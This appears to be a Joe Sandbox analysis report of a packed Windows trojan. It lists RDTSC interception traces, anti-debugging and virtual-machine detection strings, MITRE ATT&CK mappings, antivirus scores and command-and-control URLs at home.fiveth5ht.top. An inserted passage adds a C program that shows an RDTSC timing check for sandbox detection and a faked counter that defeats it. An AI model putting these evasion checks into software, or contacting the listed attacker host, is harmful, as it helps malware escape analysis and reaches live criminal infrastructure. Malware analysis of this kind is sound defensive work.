Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74709AF second address: 74709B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74709B5 second address: 74709B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74709B9 second address: 74709BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74709BD second address: 7470A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FB0A5355D60h 0x00000010 or al, 00000068h 0x00000013 jmp 00007FB0A5355D5Bh 0x00000018 popfd 0x00000019 pushfd 0x0000001a jmp 00007FB0A5355D68h 0x0000001f adc si, 52C8h 0x00000024 jmp 00007FB0A5355D5Bh 0x00000029 popfd 0x0000002a popad 0x0000002b mov dword ptr [esp], ebp 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FB0A5355D60h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7470A29 second address: 7470A38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7470A38 second address: 7470A3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7470A3F second address: 7470A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB0A4FB5B8Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7470A54 second address: 7470A6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dl, byte ptr [ebp+14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7470A6C second address: 7470A87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7470A87 second address: 7470ABB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, BAh 0x00000005 jmp 00007FB0A5355D60h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [ebp+10h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB0A5355D67h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7470ABB second address: 7470AC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7470AC1 second address: 7470AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7470AC5 second address: 7470B75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dl, 00000007h 0x0000000b jmp 00007FB0A4FB5B97h 0x00000010 test eax, eax 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FB0A4FB5B94h 0x00000019 jmp 00007FB0A4FB5B95h 0x0000001e popfd 0x0000001f mov bx, ax 0x00000022 popad 0x00000023 je 00007FB114A4B25Fh 0x00000029 jmp 00007FB0A4FB5B8Ah 0x0000002e sub ecx, ecx 0x00000030 jmp 00007FB0A4FB5B91h 0x00000035 inc ecx 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007FB0A4FB5B8Ch 0x0000003d and esi, 2AC110F8h 0x00000043 jmp 00007FB0A4FB5B8Bh 0x00000048 popfd 0x00000049 mov eax, 611DE62Fh 0x0000004e popad 0x0000004f shr eax, 1 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007FB0A4FB5B8Ch 0x0000005a rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7470B75 second address: 7470B7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7470B7B second address: 74709A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FB114A4B1CAh 0x0000000e jne 00007FB0A4FB5B7Dh 0x00000010 inc ecx 0x00000011 shr eax, 1 0x00000013 jne 00007FB0A4FB5B7Dh 0x00000015 imul ecx, ecx, 03h 0x00000018 movzx eax, dl 0x0000001b cdq 0x0000001c sub ecx, 03h 0x0000001f call 00007FB0A4FC607Dh 0x00000024 cmp cl, 00000040h 0x00000027 jnc 00007FB0A4FB5B97h 0x00000029 cmp cl, 00000020h 0x0000002c jnc 00007FB0A4FB5B88h 0x0000002e shld edx, eax, cl 0x00000031 shl eax, cl 0x00000033 ret 0x00000034 or edx, dword ptr [ebp+0Ch] 0x00000037 or eax, dword ptr [ebp+08h] 0x0000003a or edx, 80000000h 0x00000040 pop ebp 0x00000041 retn 0010h 0x00000044 push ebp 0x00000045 push 00000001h 0x00000047 push edx 0x00000048 push eax 0x00000049 call edi 0x0000004b mov edi, edi 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7450D57 second address: 7450D5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7450D5B second address: 7450D5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7450D5F second address: 7450D65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7450D65 second address: 7450DAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B96h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d mov bl, cl 0x0000000f pushad 0x00000010 mov edi, 70EF823Ch 0x00000015 movsx edi, si 0x00000018 popad 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c jmp 00007FB0A4FB5B8Ch 0x00000021 pop ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FB0A4FB5B8Ah 0x0000002b rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7450DAD second address: 7450DB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7450DB3 second address: 7450DB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7450DB9 second address: 7450DBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7460574 second address: 7460578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7460578 second address: 746057C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 746057C second address: 7460582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7460582 second address: 74605AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edx 0x00000005 pushfd 0x00000006 jmp 00007FB0A5355D5Ch 0x0000000b and ah, FFFFFFF8h 0x0000000e jmp 00007FB0A5355D5Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 pushad 0x00000019 mov di, E01Ah 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74605AF second address: 7460603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FB0A4FB5B97h 0x00000009 pop eax 0x0000000a popad 0x0000000b popad 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e call 00007FB0A4FB5B91h 0x00000013 mov eax, 451523F7h 0x00000018 pop ecx 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c jmp 00007FB0A4FB5B93h 0x00000021 xchg eax, ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
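The interceptor records above are produced by the sandbox trapping every RDTSC the sample executes: each record runs from one rdtsc (at "First address") to the next ("second address") and lists the instructions between them, which are mostly pushad/popad pairs, register shuffles and short jmps, with the counter value in edx:eax often discarded immediately by the trailing pop edx / pop eax. The strings \\.\Oreans.vxd and Software\WinLicense found in memory further down are the driver and registry names used by Oreans Technologies' WinLicense/Themida protector, which is consistent with this rdtsc-laden filler. The C program below is an added example, not code from the sample, the protector or Joe Sandbox. It shows the timing check that such filler supports (two counter reads around a short filler, the minimum over many samples, a comparison against a threshold) next to the interceptor-side counter a sandbox can present so that the check passes. The filler body, FAKE_STEP and the 2000-tick threshold are constructed values; on non-x86 hosts the code substitutes clock_gettime for RDTSC, an assumption made only to keep it portable.

```c
/* Added example: RDTSC timing check versus an RDTSC interceptor.
 * Not code from the analysed sample, from WinLicense/Themida or from
 * Joe Sandbox. Threshold and filler values are constructed. */
#include <stdint.h>
#include <stdio.h>
#include <time.h>
#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
#endif

typedef uint64_t (*tsc_reader)(void);

/* Real counter: RDTSC on x86. On other hosts a monotonic clock stands in
 * (assumption for portability; the real sample only runs on x86). */
uint64_t read_real_tsc(void) {
#if defined(__x86_64__) || defined(__i386__)
    return __rdtsc();
#else
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ULL + (uint64_t)ts.tv_nsec;
#endif
}

/* What an interceptor that virtualises RDTSC can present instead: a counter
 * that advances by a small fixed step per read, hiding the cost of the trap.
 * FAKE_STEP is a constructed value. */
#define FAKE_STEP 24ULL
static uint64_t fake_counter;
uint64_t read_fake_tsc(void) { fake_counter += FAKE_STEP; return fake_counter; }
void reset_fake_tsc(void) { fake_counter = 0; }

/* Protector-style filler between the two reads: a few register shuffles
 * standing in for the pushad/jmp/xchg noise in the stubs above. */
static volatile uint32_t sink;
static void filler(void) {
    uint32_t a = 0x4BD1, b = 0x487A;
    a ^= b;
    b += a;
    a = (a << 3) | (a >> 29);
    sink = a ^ b;
}

/* One measurement: read, filler, read again, return the difference. */
uint64_t one_delta(tsc_reader rd) {
    uint64_t t0 = rd();
    filler();
    uint64_t t1 = rd();
    return t1 - t0;
}

/* Minimum over N samples: a single sample is dominated by interrupts and
 * cache misses; the minimum approximates the true cost of the pair.
 * Returns UINT64_MAX when samples == 0. */
uint64_t min_delta(tsc_reader rd, unsigned samples) {
    uint64_t best = UINT64_MAX;
    for (unsigned i = 0; i < samples; i++) {
        uint64_t d = one_delta(rd);
        if (d < best) best = d;
    }
    return best;
}

/* Decision: if even the cheapest observed pair costs more than `threshold`
 * ticks, something (RDTSC exiting in a hypervisor, single-stepping, an
 * instruction-level tracer) sits between the two reads. */
#define TICK_THRESHOLD 2000ULL   /* constructed, illustrative value */
int looks_instrumented(uint64_t min_delta_ticks, uint64_t threshold) {
    return min_delta_ticks > threshold;
}

int main(void) {
    uint64_t real = min_delta(read_real_tsc, 256);
    reset_fake_tsc();
    uint64_t fake = min_delta(read_fake_tsc, 256);
    printf("real counter:        min delta %llu ticks -> %s\n",
           (unsigned long long)real,
           looks_instrumented(real, TICK_THRESHOLD) ? "instrumented" : "plain");
    printf("intercepted counter: min delta %llu ticks -> %s\n",
           (unsigned long long)fake,
           looks_instrumented(fake, TICK_THRESHOLD) ? "instrumented" : "plain");
    return 0;
}
```

The threshold is the decisive parameter: on a hypervisor that lets RDTSC execute natively the minimum delta is a few dozen ticks and the check passes, while trapping or single-stepping each read costs thousands of ticks per pair. Because this sample executes rdtsc in nearly every stub, an interceptor must keep its substituted counter monotonic and cheap across thousands of reads; one slow or non-monotonic reply is exactly what a check like this is built to notice.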
Source: C:\Users\user\Desktop\xXe4fTmV2h.exe Special instruction interceptor: First address: 12DF11E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\xXe4fTmV2h.exe Special instruction interceptor: First address: 1504FCA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\xXe4fTmV2h.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\xXe4fTmV2h.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\xXe4fTmV2h.exe Code function: 5_2_00DE9980 rdtsc 5_2_00DE9980
Source: C:\Users\user\Desktop\xXe4fTmV2h.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\xXe4fTmV2h.exe Code function: 5_2_00C0255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses, 5_2_00C0255D
Source: C:\Users\user\Desktop\xXe4fTmV2h.exe Code function: 5_2_00C029FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle, 5_2_00C029FF
Source: xXe4fTmV2h.exe, xXe4fTmV2h.exe, 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmp Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: xXe4fTmV2h.exe Binary or memory string: Hyper-V RAW
Source: xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmp Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: xXe4fTmV2h.exe, 00000005.00000003.1327411652.0000000001A51000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=
Source: xXe4fTmV2h.exe, 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: xXe4fTmV2h.exe, 00000005.00000003.1421458509.0000000001AAA000.00000004.00000020.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1427566317.0000000001AB1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\xXe4fTmV2h.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\xXe4fTmV2h.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\xXe4fTmV2h.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\xXe4fTmV2h.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\xXe4fTmV2h.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\xXe4fTmV2h.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\xXe4fTmV2h.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\xXe4fTmV2h.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\xXe4fTmV2h.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\xXe4fTmV2h.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\xXe4fTmV2h.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\xXe4fTmV2h.exe File opened: NTICE
Source: C:\Users\user\Desktop\xXe4fTmV2h.exe File opened: SICE
Source: C:\Users\user\Desktop\xXe4fTmV2h.exe File opened: SIWVID
Source: C:\Users\user\Desktop\xXe4fTmV2h.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\xXe4fTmV2h.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\xXe4fTmV2h.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\xXe4fTmV2h.exe Code function: 5_2_00DE9980 rdtsc 5_2_00DE9980
Source: xXe4fTmV2h.exe, xXe4fTmV2h.exe, 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmp Binary or memory string: ~Program Manager
Source: C:\Users\user\Desktop\xXe4fTmV2h.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\xXe4fTmV2h.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\xXe4fTmV2h.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\xXe4fTmV2h.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\xXe4fTmV2h.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: xXe4fTmV2h.exe, 00000005.00000003.1289627107.0000000007680000.00000004.00001000.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmp Binary or memory string: procmon.exe
Source: xXe4fTmV2h.exe, 00000005.00000003.1289627107.0000000007680000.00000004.00001000.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmp Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Signature Results Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic TCP traffic: 192.168.2.11:49710 -> 5.101.3.217:80
MITRE ATT&CK Matrix (the number in parentheses is the one shown beside that technique in the report's matrix)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Command and Scripting Interpreter (2); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (23); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (751); Virtualization/Sandbox Evasion (23); Process Discovery (13); Remote System Discovery (1); File and Directory Discovery (1); System Information Discovery (216)
Lateral Movement: Exploitation of Remote Services (1); Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (11); Data from Local System (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (4); Non-Application Layer Protocol (4); Application Layer Protocol (5); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Source | Detection | Scanner | Label
xXe4fTmV2h.exe | 40% | Virustotal |
xXe4fTmV2h.exe | 53% | ReversingLabs | Win32.Trojan.Generic
xXe4fTmV2h.exe | 100% | Avira | TR/Crypt.TPM.Gen
xXe4fTmV2h.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17 | 0% | Avira URL Cloud | safe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0p | 0% | Avira URL Cloud | safe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862E | 0% | Avira URL Cloud | safe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0 | 0% | Avira URL Cloud | safe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS | 0% | Avira URL Cloud | safe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862 | 0% | Avira URL Cloud | safe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862lsef | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
home.fiveth5ht.top | 5.101.3.217 | true | false | | high
httpbin.org | 3.218.7.103 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0 | true | Avira URL Cloud: safe | unknown
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862 | true | Avira URL Cloud: safe | unknown
https://httpbin.org/ip | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmp | false | | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17 | xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmp | false | Avira URL Cloud: safe | unknown
http://html4/loose.dtd | xXe4fTmV2h.exe, 00000005.00000003.1289627107.0000000007680000.00000004.00001000.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmp | false | | high
https://curl.se/docs/alt-svc.html# | xXe4fTmV2h.exe | false | | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862lsef | xXe4fTmV2h.exe, 00000005.00000002.1427343914.0000000001A49000.00000004.00000020.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000003.1422364338.0000000001A47000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://httpbin.org/ipbefore | xXe4fTmV2h.exe, 00000005.00000003.1289627107.0000000007680000.00000004.00001000.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmp | false | | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862E | xXe4fTmV2h.exe, 00000005.00000002.1427343914.0000000001A49000.00000004.00000020.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000003.1422364338.0000000001A47000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://curl.se/docs/http-cookies.html | xXe4fTmV2h.exe, xXe4fTmV2h.exe, 00000005.00000003.1289627107.0000000007680000.00000004.00001000.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmp | false | | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0p | xXe4fTmV2h.exe, 00000005.00000002.1427254897.0000000001A1E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://curl.se/docs/hsts.html# | xXe4fTmV2h.exe | false | | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS | xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmp | false | Avira URL Cloud: safe | unknown
https://curl.se/docs/alt-svc.html | xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmp | false | | high
http://.css | xXe4fTmV2h.exe, 00000005.00000003.1289627107.0000000007680000.00000004.00001000.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmp | false | | high
http://.jpg | xXe4fTmV2h.exe, 00000005.00000003.1289627107.0000000007680000.00000004.00001000.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
5.101.3.217 | home.fiveth5ht.top | Russian Federation | 34665 | PINDC-ASRU | false
3.218.7.103 | httpbin.org | United States | 14618 | AMAZON-AESUS | false
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1581223
                          Start date and time:2024-12-27 08:46:48 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 6m 7s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:11
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:xXe4fTmV2h.exe
                          renamed because original name is a hash value
                          Original Sample Name:764767d6adf6fa8a9c0b437d79a7a973.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@1/0@8/2
                          EGA Information:
